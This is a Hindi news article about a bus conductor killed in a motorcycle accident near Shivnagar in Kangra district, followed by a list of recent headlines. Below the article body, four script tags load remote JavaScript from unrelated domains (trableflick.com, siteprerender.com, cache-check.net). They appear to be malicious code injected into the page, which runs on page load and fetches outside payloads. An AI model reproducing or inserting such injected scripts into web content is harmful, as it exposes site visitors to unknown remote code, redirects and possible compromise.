कांगड़ाः शिवनगर में सड़क हादसे में परिवहन निगम परिचालक की मौत

<p>जिला कांगड़ा में उपमंडल जयसिंहपुर के तहत शिवनगर के पास रिट गांव के अरुण कुमार की गत देर रात मोटरसाइकिल दुर्घटना में मौत हो गई। मृतक हिमाचल पथ परिवहन निगम में परिचालक था जो रोजाना की तरह बस खड़ी कर घर जा रहा था। इस दौरान घर से 500 मीटर की दूरी पर गुगा लाहट के पास मोड़ पर बाइक अनियंत्रित होने से वह बाइक सहित पुल के नीचे जा गिरा। हादसे में अरुण के सिर पर गहरी चोट आई। अरुण को अस्पताल पहुंचाया गया तब तक उसकी मृत्यु हो चुकी थी।</p>

<p>मिली जानकारी के अनुसार मृतक रोजाना की तरह रात को गंदड़ में बस खड़ी कर अपने मोटरसाइकिल पर घर आ रहा था। लेकिन गत रात अरुण के घर न आने पर घरवालों ने उसे फ़ोन पर संपर्क किया। लेकिन फोन नहीं उठाने पर परिवारजनों और पड़ोसियों ने रात को ही अरुण की खोजबीन शुरू की।</p>

<p>जब उन्होंने घर से करीब 500 मीटर की दूर जाकर देखा तो यहां पर गुग्गा लाहट के पास मोटरसाइकिल सहित अरुण पुल के नीचे पड़ा हुआ मिला। अरूण के सिर पर गहरी चोटें आई थी। उसे रात को ही अस्पताल पहुंचाया गया जहां डाक्टरों ने उसे मृत घोषित कर दिया। घटना की पुष्टि करते हुए लंबागांव थाना प्रभारी अश्वनी शर्मा ने बताया कि सूचना मिलने पर पुलिस ने शव को कब्जे में लेकर छानबीन शुरू कर दी। शव का पोस्टमार्टम करवाया जा रहा है।</p>

<p><img src=”/media/gallery/images/image(1820).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1608880797891″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

31 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

1 hour ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

2 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago